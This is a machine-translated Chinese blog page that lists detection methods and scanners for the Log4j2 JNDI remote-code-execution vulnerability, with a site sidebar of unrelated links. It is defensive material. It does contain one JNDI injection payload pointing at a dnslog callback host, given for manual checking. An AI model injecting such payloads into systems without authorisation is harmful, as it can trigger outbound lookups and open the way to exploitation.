当前位置:网站首页>Log4j2 vulnerability detection tool list
Log4j2 vulnerability detection tool list
2022-06-25 20:19:00 【Bypass--】
distance Log4j2 It's been a month since the vulnerability was exposed , The serious impact it has caused does not need to be mentioned again . as time goes on , New vulnerabilities will continue to emerge , Old loopholes will continue to disappear , And this Log4j2 Medium RCE Vulnerabilities can take years to resolve . therefore , In the next period of time , This loophole is still the focus we need to pay attention to .
This paper collects and sorts out several vulnerability detection methods and tools , For use Log4j2 Vulnerability detection and self inspection .
1、dnslog Manual verification method
First, in the dnslog The platform obtains a subdomain name , Try to construct payload, Insert request packet .
${jndi:ldap://bypass.fzuqgl.ceye.io}
adopt dnslog Whether the platform receives the request , Preliminarily judge whether there are loopholes in the target environment .

2、Log4j-scan
One for finding log4j2 Loopholes python Script , Support url testing , Support HTTP Request the head and POST Fuzzy test of data parameters .
github Project address :
https://github.com/fullhunt/log4j-scan
3、Log4j2 burp Passive scanning plug-in
Through plug-ins , take lLog4j2 Vulnerability detection capabilities are integrated into burp, So as to improve the vulnerability detection ability of security testers .
github Project address :
https://github.com/f0ng/log4j2burpscannerLog4j2 burp Passive scanning plug-in effect :

4、AWVS scanning log4j2 Loophole
AWVS14 Latest version support Log4j2 Vulnerability detection , Support batch scanning , Vulnerability scanning artifact won't let you down , Get ready to update the Arsenal .

5、 Product grade Log4j2 Vulnerability detection tools
This testing tool is based on Tencent security binAuditor, Support Jar/Ear/War Package upload , One click upload to get the test results .
Detection address :
https://bsca.ms.qq.com/Jar Packet test results :

6、Log4j2 Local detection tools
Extracted from Changting Muyun products Log4j2 Local detection tools , It can quickly discover the risk of the current server log4j2 application .
Log4j2 Vulnerability detection tool address :
https://log4j2-detector.chaitin.cn/
7、360 Log4j2 Test kit
Browser passive scanning + Local detection tools , Provides a complete Log4j2 Vulnerability detection scheme , in addition , The toolkit also includes Log4j2 Patch scheme , Here's the picture :

边栏推荐
- Huawei fast application access advertising service development guide
- Yaml configuration
- Huawei in application review test requirements
- My official account writing experience sharing
- Corporate finance formula_ P1_ Accounting statement and cash flow
- II Traits (extractors)
- Web container basic configuration
- 打新债证券开户安全吗
- <C>. Rolling phase division
- 2.17(Avoid The Lakes)
猜你喜欢

Profile path and name

E-commerce project environment construction

Install and initialize MySQL (under Windows)

206. reverse linked list (insert, iteration and recursion)
![[harmonyos] [arkui] how can Hongmeng ETS call pa](/img/19/9d2c68be48417e0aaa0d27068a67ce.jpg)
[harmonyos] [arkui] how can Hongmeng ETS call pa

TypeError: __ init__ () takes 1 positional argument but 5 were given

Teach you how to create and publish a packaged NPM component

Thymleaf template configuration analysis

Wechat applet swiper simple local picture display appears large blank

Share a billing system (website) I have developed
随机推荐
Png to NII
The error log of vscode connecting to the server shows the problem of "insufficient permission". Directly use root to connect
String since I can perform performance tuning, I can call an expert directly
Some pictures of real machine preview development and debugging are not shown
Two types of attribute injection methods
Pat b1054 average (20 points)
在打新债开户证券安全吗?低佣金靠谱吗
Now meditation: crash service and performance service help improve application quality
One picture to achieve the selected effect
PAT B1059
Is it safe to open an account with a mobile phone? Where can I open an account to buy shares?
2.4 finding the sum of the first n terms of the interleaved sequence
PAT B1081
Leetcode daily question - 27 Remove element (simple)
Number of wechat applet custom input boxes
II Traits (extractors)
PAT B1067
手机开户股票安全吗,买股票在哪开户?
Applet canvas generate sharing Poster
Short video is just the time. How can you quickly build your video creation ability in your app?